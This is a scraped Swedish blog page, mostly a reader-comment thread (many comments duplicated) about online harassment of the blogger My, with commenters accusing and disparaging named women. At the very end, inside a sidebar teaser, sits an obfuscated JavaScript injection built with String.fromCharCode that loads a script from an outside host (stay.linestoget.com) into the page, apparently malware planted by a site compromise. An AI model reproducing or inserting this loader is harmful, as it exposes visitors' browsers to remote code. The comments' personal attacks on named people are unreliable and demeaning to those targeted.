får man leken tåla” ?

   att sedan Cam Cam, låter det ske eh hetsjakt och en mobbning i kommentarsfältet där man påstår att jag legat både till höger och vänster. man påstår at jag är psykiskt sjuk. och HUNDRA grejer till. -Är det att ta ansvar och vara en förebild? Nej, det är det banne mig inte okay! Det är personangrepp, trakasserier och påhopp! Tyvärr Amanda så handlar nog detta om mycket annat än att följa just lagen. Du har helt rätt. Samarbeten ska markeras. Absolut. Ska jag kallas psyksjuka, mytoman, och behöva sitt i X-ANTAL förhör för det? för att jag vid 2 tillfällen missade just det? Liiiiite hårt kan jag tycka….

   • Polisanmäl henne My, å sen låter du de som håller på å trakasserar dig vara. Det dom gör å säger, säger ingenting om dig. Utan det säger ju nåt om hur dom är…………. Kram på dig 😉 <3

 65. Hej My! Finntanten här igen.
  Min kommentar godkänns inte av Johanna ?
  Såhär skrev jag :
  Camilla • 2 timmar sen
  Din kommentar inväntar granskning.
  Här sjönk du nog lågt nu Johanna. Att det nu är OK att bete sig så som CamCam ?!?! Menar du verkligen det ? Jag trodde inte det om dej , faktiskt.
  I samma veva som du skriver att hat föder hat , typ ? Hur fan kan du tycka , hur fan kan någon tycka att hennes blogg är ok ??
  Vad är det för elaka, hemska mänskor som låter denna gå på så med folk ?
  Men hon kanske inte skriver elakt om dej Johanna nu mera då ni är ”kompisar” ?
  Svara

  • Hej! Blev din kommentar godkänd? Jag skrev en saklig med konstruktiv kritik som tydligen var för nära sanningen. Så den publicerades så klart inte. Hon är knappast en person som står för för vad hon gör eller säger, mycket tomma ord som visar upp en falsk polerad fasad. Om man anser att mobbing och näthat är fel så är det rätt märkligt att anse att det Cam Cam skriver är ok. Osmakligt är bara förnamnet.

   • Nej min kommentar togs bort sen helt, den publicerades aldrig .
    Hann kopiera det jag satte i här.
    Synnerligen osmakligt, tänk att vuxna mänskor kan vara så här elaka då de får vara anonyma ?
    Och värst – det är Kvinnor.

    • Johanna är inte så ärlig och sann som hon framstår sig som. Hon släpper inte fram mina kommentarer vilket bevisar att hon inte kan ta en vettig diskussion angående sitt agerande.
     Det är extremt pinsamt med vuxna kvinnor som beter sig som tonårstjejer.
     Jag arbetar på en gymnasieskola, eleverna här som är 16-20 år som har mer vett/etikett och sunt förnuft än damerna Toftby, Castellari och Ilmrud. Just nu är de som ler och långhalm i Johannas kommentarsfält. Att säga sig vara emot mobbing och näthat så fort självklart inte drabbar dem så går bra, men när de nån gång får en släng själva så är det alltid en annan sak.
     Konsekvens, sympati/empati och genuin snällhet har de svårt att stava till.

 66. Vänd andra sidan till eller anmäl hur svårt kan det vara , du har ett val men att lägga ut skiten hela tiden utan att göra något är konstigt!! Och går det inte att göra något åt det ”lagmässigt” ignorera och fortsätt med ditt liv annars mår du dåligt och för Guds skull läs inte skiten… jag är lite trött på följetongen här inne kan förstå om du är ute efter läsare då gör du rätt för dem ökar ju varje gång nått sånt här dyker upp , Men om du inte är det anmäl eller skit i det då visar du dig själv och dina läsare respekt… och att dra upp Johanna igen var väl onödigt lika bra att du accepterar att hon inte bryr sig och är klar med dig så låt henne vara eller ta det face2face och skriv inte om det här mer schysst kan jag tycka..visst jag förstår att du blir ledsen men tyvärr är det nog baksidan av att synas så låt det rinna av dig för talas det osanning om dig så behöver du ju inte bry dig tar nog mer på hatarna om du fortsätter med ditt liv..finns så mycket elände i världen att på riktigt bry sig i än det här..

 67. Hej My! Finntanten här igen.
  Min kommentar godkänns inte av Johanna 🙂
  Såhär skrev jag :

  Camilla • 2 timmar sen
  Din kommentar inväntar granskning.

  Här sjönk du nog lågt nu Johanna. Att det nu är OK att bete sig så som CamCam ?!?! Menar du verkligen det ? Jag trodde inte det om dej , faktiskt.
  I samma veva som du skriver att hat föder hat , typ ? Hur fan kan du tycka , hur fan kan någon tycka att hennes blogg är ok ??
  Vad är det för elaka, hemska mänskor som låter denna gå på så med folk ?
  Men hon kanske inte skriver elakt om dej Johanna nu mera då ni är ”kompisar” ?

  Svara

  • Hej! Blev din kommentar godkänd? Jag skrev en saklig med konstruktiv kritik som tydligen var för nära sanningen. Så den publicerades så klart inte. Hon är knappast en person som står för för vad hon gör eller säger, mycket tomma ord som visar upp en falsk polerad fasad. Om man anser att mobbing och näthat är fel så är det rätt märkligt att anse att det Cam Cam skriver är ok. Osmakligt är bara förnamnet.

   • Nej min kommentar togs bort sen helt, den publicerades aldrig .
    Hann kopiera det jag satte i här.
    Synnerligen osmakligt, tänk att vuxna mänskor kan vara så här elaka då de får vara anonyma 🙁
    Och värst – det är Kvinnor.

    • Johanna är inte så ärlig och sann som hon framstår sig som. Hon släpper inte fram mina kommentarer vilket bevisar att hon inte kan ta en vettig diskussion angående sitt agerande.
     Det är extremt pinsamt med vuxna kvinnor som beter sig som tonårstjejer.

     Jag arbetar på en gymnasieskola, eleverna här som är 16-20 år som har mer vett/etikett och sunt förnuft än damerna Toftby, Castellari och Ilmrud. Just nu är de som ler och långhalm i Johannas kommentarsfält. Att säga sig vara emot mobbing och näthat så fort självklart inte drabbar dem så går bra, men när de nån gång får en släng själva så är det alltid en annan sak.
     Konsekvens, sympati/empati och genuin snällhet har de svårt att stava till.

 68. Vänd andra sidan till eller anmäl hur svårt kan det vara , du har ett val men att lägga ut skiten hela tiden utan att göra något är konstigt!! Och går det inte att göra något åt det ”lagmässigt” ignorera och fortsätt med ditt liv annars mår du dåligt och för Guds skull läs inte skiten… jag är lite trött på följetongen här inne kan förstå om du är ute efter läsare då gör du rätt för dem ökar ju varje gång nått sånt här dyker upp , Men om du inte är det anmäl eller skit i det då visar du dig själv och dina läsare respekt… och att dra upp Johanna igen var väl onödigt lika bra att du accepterar att hon inte bryr sig och är klar med dig så låt henne vara eller ta det face2face och skriv inte om det här mer schysst kan jag tycka..visst jag förstår att du blir ledsen men tyvärr är det nog baksidan av att synas så låt det rinna av dig för talas det osanning om dig så behöver du ju inte bry dig tar nog mer på hatarna om du fortsätter med ditt liv..finns så mycket elände i världen att på riktigt bry sig i än det här..

 69. Camilla, Camilla, Camilla….ända sen jag träffade henne och umgicks i samma kretsar som henne i Los Angeles för 14år sen så har hon armbågat sig fram hänsynslöst för att försöka få sina 15minuter i rampljuset.
  Jag halkade in här av en slump via en länk i ett mail från allt för föräldrar och vet ni, redan när jag såg ”CamCam” så fattade jag direkt vem som var i farten (igen!).
  Tyvärr verkar det vara Camillas grej att göra vad som helst för uppmärksamhet. Kan hon inte få 10.000pers som älskar henne, så är hon OK med 10.000pers som hatar henne….bara rampljuset är riktat mot henne.
  Det är så sorgligt att en sån förvirrad själ måste härja med ALLT och ALLA istället för att försöka hitta sig själv och vara nöjd med SITT liv.
  Ända sen våra vägar korsades så har hon haft detta sjuka behov av bekräftelse.
  När hon läser denna kommentar (för jag lovar, hon läser vad folk tycker och vilken ”sida” vi som kommenterar tar) ,så kommer det antagligen brinna till i huvudet på henne då hon tidigare tyckt att jag är ett ”troll” för att jag gick till försvar när hon hängde ut och kritiserade gemensamma vänner till oss, som tillslut hade tröttnat på hennes skitsnack och avslutat bekantskapen. Detta gjorde hon på en blogg som hon (enligt egen utsago) hade 100.000st följare på! Hon skrev fruktansvärt nedlåtande texter och la ut foton på tjejerna och spred rykten…bara för att HON kände sig sårad över att vänskapen tagit slut.
  En vuxen människa har inget behov av att agera såhär…man sörjer privat över förlorat förhållande med människor man tyckte om, sen släpper man och går vidare. Likväl har en frisk och välmående vuxen människa inget behov av att hoppa på folk (och framförallt offentliga personer) bara för att man själv är bitter på att man inte är känd själv.
  Jag känner inte dig My och har knappt aldrig läst ett inlägg på din blogg och hur svårt det än är att inte bli provocerad och istället bara ”skaka av sig” detta så ta inte åt dig.
  Tyvärr kommer Camilla fortsätta att jaga uppmärksamhet och framhäva sig själv som störst, bäst och vackrast men eftersom det inte är första gången hon biter sig själv i röven så börjar verkligheten snart komma ikapp och byter hon snart inte identitet så kommer drömmen om sponsorsamarbeten och ”Sveriges största blogg” eller turnélivet som så kallad artist, högst troligt brinna upp rätt fort, då hennes namn kommer för evigt att ge en bitter eftersmak i de sammanhang det dyker upp…
  //Mikaela, Örebro

 70. Camilla, Camilla, Camilla….ända sen jag träffade henne och umgicks i samma kretsar som henne i Los Angeles för 14år sen så har hon armbågat sig fram hänsynslöst för att försöka få sina 15minuter i rampljuset.
  Jag halkade in här av en slump via en länk i ett mail från allt för föräldrar och vet ni, redan när jag såg ”CamCam” så fattade jag direkt vem som var i farten (igen!).
  Tyvärr verkar det vara Camillas grej att göra vad som helst för uppmärksamhet. Kan hon inte få 10.000pers som älskar henne, så är hon OK med 10.000pers som hatar henne….bara rampljuset är riktat mot henne.
  Det är så sorgligt att en sån förvirrad själ måste härja med ALLT och ALLA istället för att försöka hitta sig själv och vara nöjd med SITT liv.
  Ända sen våra vägar korsades så har hon haft detta sjuka behov av bekräftelse.
  När hon läser denna kommentar (för jag lovar, hon läser vad folk tycker och vilken ”sida” vi som kommenterar tar) ,så kommer det antagligen brinna till i huvudet på henne då hon tidigare tyckt att jag är ett ”troll” för att jag gick till försvar när hon hängde ut och kritiserade gemensamma vänner till oss, som tillslut hade tröttnat på hennes skitsnack och avslutat bekantskapen. Detta gjorde hon på en blogg som hon (enligt egen utsago) hade 100.000st följare på! Hon skrev fruktansvärt nedlåtande texter och la ut foton på tjejerna och spred rykten…bara för att HON kände sig sårad över att vänskapen tagit slut.
  En vuxen människa har inget behov av att agera såhär…man sörjer privat över förlorat förhållande med människor man tyckte om, sen släpper man och går vidare. Likväl har en frisk och välmående vuxen människa inget behov av att hoppa på folk (och framförallt offentliga personer) bara för att man själv är bitter på att man inte är känd själv.
  Jag känner inte dig My och har knappt aldrig läst ett inlägg på din blogg och hur svårt det än är att inte bli provocerad och istället bara ”skaka av sig” detta så ta inte åt dig.
  Tyvärr kommer Camilla fortsätta att jaga uppmärksamhet och framhäva sig själv som störst, bäst och vackrast men eftersom det inte är första gången hon biter sig själv i röven så börjar verkligheten snart komma ikapp och byter hon snart inte identitet så kommer drömmen om sponsorsamarbeten och ”Sveriges största blogg” eller turnélivet som så kallad artist, högst troligt brinna upp rätt fort, då hennes namn kommer för evigt att ge en bitter eftersmak i de sammanhang det dyker upp…
  //Mikaela, Örebro

 71. Blir förbannad och upprörd. Det finns människor omkring oss som är snälla, ödmjuka, vackra och på gränsen till underbara – människor som vi inte känner men som vi önskar att vi gjorde för vi skulle behöva få uppleva deras starkt skinande personligheter.
  Sen finns det människor som i sin egen tragiska verklighet endast finner något värde i sig själva genom att spy sitt hat och göra sig lustiga på andras bekostnad och genom att likt mexikanska tuppfäktare piska upp känslohav.
  My, om det finns någon som representerar den första gruppen så är det du. Jag har sagt det innan, men jag tror jag kommer undan med att säga det igen – fortsätt vara du. För du behövs. Och du behövs för att du är du och ingen annan. Ändra dig inte för någon eller något.

 72. Om jag ska vara ärlig så förstår jag inte hur du orkar. Hade jag varit i dina skor hade jag lagt ner bloggen. All skit du har fått tagit och fortfarande får ta är under all kritik. Ett högt pris du får betala. I ärlighetens namn tycker jag inte du behöver be om ursäkt för något. Vi gör alla misstag. Det hör livet till. Allt detta stjäl din energi.

 73. Blir förbannad och upprörd. Det finns människor omkring oss som är snälla, ödmjuka, vackra och på gränsen till underbara – människor som vi inte känner men som vi önskar att vi gjorde för vi skulle behöva få uppleva deras starkt skinande personligheter.

  Sen finns det människor som i sin egen tragiska verklighet endast finner något värde i sig själva genom att spy sitt hat och göra sig lustiga på andras bekostnad och genom att likt mexikanska tuppfäktare piska upp känslohav.

  My, om det finns någon som representerar den första gruppen så är det du. Jag har sagt det innan, men jag tror jag kommer undan med att säga det igen – fortsätt vara du. För du behövs. Och du behövs för att du är du och ingen annan. Ändra dig inte för någon eller något.

 74. Om jag ska vara ärlig så förstår jag inte hur du orkar. Hade jag varit i dina skor hade jag lagt ner bloggen. All skit du har fått tagit och fortfarande får ta är under all kritik. Ett högt pris du får betala. I ärlighetens namn tycker jag inte du behöver be om ursäkt för något. Vi gör alla misstag. Det hör livet till. Allt detta stjäl din energi.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/